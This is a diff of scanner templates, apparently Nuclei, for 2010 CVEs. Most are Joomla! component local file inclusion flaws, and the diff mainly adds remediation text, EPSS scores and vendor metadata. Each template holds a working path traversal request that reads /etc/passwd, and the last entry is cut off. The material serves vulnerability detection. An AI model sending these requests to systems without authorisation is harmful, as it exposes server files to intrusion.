b/http/cves/2010/CVE-2010-1717.yaml @@ -5,31 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12291 - https://nvd.nist.gov/vuln/detail/CVE-2010-1717 - - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - http://www.vupen.com/english/advisories/2010/0924 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P - cvss-score: 6.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1717 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01733 + epss-percentile: 0.86477 + cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + vendor: if_surfalert_project + product: if_surfalert + framework: joomla\! + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/01 +# digest: 4b0a004830460221009daab6272cc7c804bf48a101ee9d93308a7f742ad3c0c41b3703346ac18bc214022100c1c09dd68f8a9c141e705e7fea898d380a3c5a05eb9fddf9a0861a8e029a9cbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index e3c071a8cd..a747dae301 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1718 info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Archery Scores or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/12282 - https://nvd.nist.gov/vuln/detail/CVE-2010-1718 - - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/ - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1718 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lispeltuut + product: com_archeryscores + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/01 +# digest: 4a0a00473045022100d6b5ec93686994462121d61b11470e97d9ac6acabe1efe6e2be2836445629ba0022073d4f767163612f2d551350460e17d834756a53f0c0ec8de09e7295fe1c96779:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 0ff77f186d..ea85a89aaf 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -3,32 +3,42 @@ id: CVE-2010-1719 info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor. reference: - https://www.exploit-db.com/exploits/12233 - https://nvd.nist.gov/vuln/detail/CVE-2010-1719 - http://www.exploit-db.com/exploits/12233 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57850 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1719 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: moto-treks + product: com_mtfireeagle + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/01 +# digest: 490a004630440220774eb84a8608b3b7cb66a816e0baebbb083fac24337aec05b1d2bf082757bc9602205c904ea6091d33bc9b052372b45cb9edf7e1cec1c1cca24aaae498a844e512d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index ea1c13cc91..6b63699bf0 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1722 info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component. reference: - https://www.exploit-db.com/exploits/12177 - https://nvd.nist.gov/vuln/detail/CVE-2010-1722 - - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/ - http://www.exploit-db.com/exploits/12177 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57674 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1722 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_market + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/01 +# digest: 490a00463044022068fc8b128a1de4d7d682a6b24c6d7bedb4281ebe2c40ff85f1216cad76a6bd21022066d905184f8aa880f0d7ba59f9164ae6aa0f58a6d044f585128d2aafede4aa23:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 06ae082cab..eca3bc388a 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1723 info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12289 - https://nvd.nist.gov/vuln/detail/CVE-2010-1723 - - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/ - http://www.exploit-db.com/exploits/12289 + - http://www.vupen.com/english/advisories/2010/0926 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1723 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01956 + epss-percentile: 0.87407 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_drawroot + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/01 +# digest: 4a0a0047304502200676a330db743f396d2bd8e66a51d6930c1ac7e42100f27afb319ec18fa03ad8022100cd6316b7274dc4637025b72af8fc8149187764e7d79318f1f04010e13c9bbc87:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 6bb0aefedd..636d964e8c 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1858 info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11853 - https://nvd.nist.gov/vuln/detail/CVE-2010-1858 - - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1858 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + epss-percentile: 0.83278 + cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gelembjuk + product: com_smestorage + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a0047304502200afff45d0b734fa7b35d6ee96640607bb6a789630c3d90384831e41aa7cf2a4e022100e8597741a5e4544e2aacaf11a2f2d444bc4580aef1c36782eb4c6c75003daf65:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index e713e73ade..c2f0b45159 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -3,21 +3,29 @@ id: CVE-2010-1870 info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd - severity: info + severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + remediation: | + Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - https://www.exploit-db.com/exploits/14360 - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16 + - http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html classification: - cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl + epss-score: 0.05379 + epss-percentile: 0.92264 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl http: - method: GET @@ -33,4 +41,4 @@ http: - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# Enhanced by mp on 2022/03/20 +# digest: 4a0a00473045022066fd9576448f6693b3df35da0581e188942e954dd6b58a085f859d9eba46f9340221008398f405ba0d8658b08df4650909ab899769bb8700d2e7aee3b6b19ccd9c61b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 10836dc1c3..67e3e092f3 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -5,31 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/11851 - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/ - - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/ + - http://www.exploit-db.com/exploits/11851 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01222 + epss-percentile: 0.83811 + cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com-property + product: com_properties + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/16 +# digest: 4a0a0047304502206802b8e72f542126e4ff23d7da65334f338cd4c0740d2ae4d1b9949fc89662a2022100bbdb399c323348837f18fc5994c724860ed0d98beca1f2b370d20b0ff05964ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 49e54d9c55..6c3f6d0e64 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -5,31 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/12317 - https://nvd.nist.gov/vuln/detail/CVE-2010-1878 - - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/ - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58031 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1878 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: blueflyingfish.no-ip + product: com_orgchart + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/17 +# digest: 4a0a00473045022100e1f2cf6994fa96b1c27f9d26f1ef29b42afe4af6fd70a2b0adb9df4670a991b0022034179c5c3550807c9a00f2e63c1ff0fcd5711ea9c47ff81f1a1be38b9bb5baf0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 84f1ce52d0..833ee72106 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12239 - https://nvd.nist.gov/vuln/detail/CVE-2010-1952 - - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/ - http://www.exploit-db.com/exploits/12239 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1952 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmstactics + product: com_beeheard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a0047304502210088f4b08aa78ddccbf4567e403b80ae9ac6198c6fc352c936598255931333ce060220279ba74707dfb071d5ad933abd5cbf9c1264e7431b8f84c25ecffc0066f8d5b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 42bddbf75e..e1dc0a37da 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -5,32 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12288 - https://nvd.nist.gov/vuln/detail/CVE-2010-1953 - http://www.vupen.com/english/advisories/2010/0927 - http://www.exploit-db.com/exploits/12288 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1953 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.05684 + epss-percentile: 0.92475 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multimap + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 +# digest: 490a0046304402202d48352cf15ed126b000a77474e75f6453b6e3f04ba332114ac98f676dbd529b02204fd10f0778166d3694ae0887450bebe9fa8c9dd214ed0b9fdd2030f2704f3a38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index b1177f4c5c..54f82fce92 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12287 - https://nvd.nist.gov/vuln/detail/CVE-2010-1954 - - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - http://www.exploit-db.com/exploits/12287 - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/0928 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1954 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.05684 + epss-percentile: 0.92475 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multiroot + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a00473045022100e72ee512c6cef0d489d1c870a02e018b9f2adad5e2e13939b08141a5c993e65f022012fea2fd2f86105345a4551853467c8e317bed20d983192f98cb5b0ba67b4d31:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 0bb506f5e4..9e1e117c61 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -5,31 +5,38 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/ - - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/ - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_blogfactory + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4b0a00483046022100a2ac888196d4cc2bd400f50eac9c0634c5f3d0ae0b8ed1f20ba199df0dcc6c53022100e7d088b7afb2696a5d28f79cc9e4ef3a45b275bf5d6d087cc4a7987366a52a27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 8e63181235..f2c6cb00a0 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -5,31 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12285 - https://nvd.nist.gov/vuln/detail/CVE-2010-1956 - - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/ - http://www.exploit-db.com/exploits/12285 - remediation: Upgrade to a supported version. + - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html + - http://www.vupen.com/english/advisories/2010/0930 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1956 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.06055 + epss-percentile: 0.9267 + cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_gadgetfactory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# digest: 4a0a0047304502205bd6cbca7904bc7ae1823c786b1f20d4adb97f75328e1294beb771bf742ae49b022100c805a7078985f08d62a74155597b2a139a5ed7120149e08fa02e95e0baecddb6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 74a976409a..dcc633f62a 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -5,19 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12235 - https://nvd.nist.gov/vuln/detail/CVE-2010-1957 - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1957 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_lovefactory + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/16 +# digest: 4b0a00483046022100e169c7c29904712f58da2a9cb47241f51cc914874f550b4cbfa10d70487f3f5502210086beefb2a819ca920082f7b5f0a977092a8f20fd9625722d780c34e9ff729409:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index b61c4020cb..be9f3083fe 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -5,20 +5,23 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 - - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/ - - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gohigheris + product: com_jwhmcs + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/16 +# digest: 4b0a00483046022100885483aa6022f72b45c03785a8a0c8d0e3c304c1e4b78831d0bfc0c4c8833f6a02210096136f69f154cb7a1ca5afddd60a789aa79e17b252f815bc39b3a8262bba65ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index d47ae83886..f69f3a60dc 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -3,22 +3,27 @@ id: CVE-2010-1979 info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12088 - 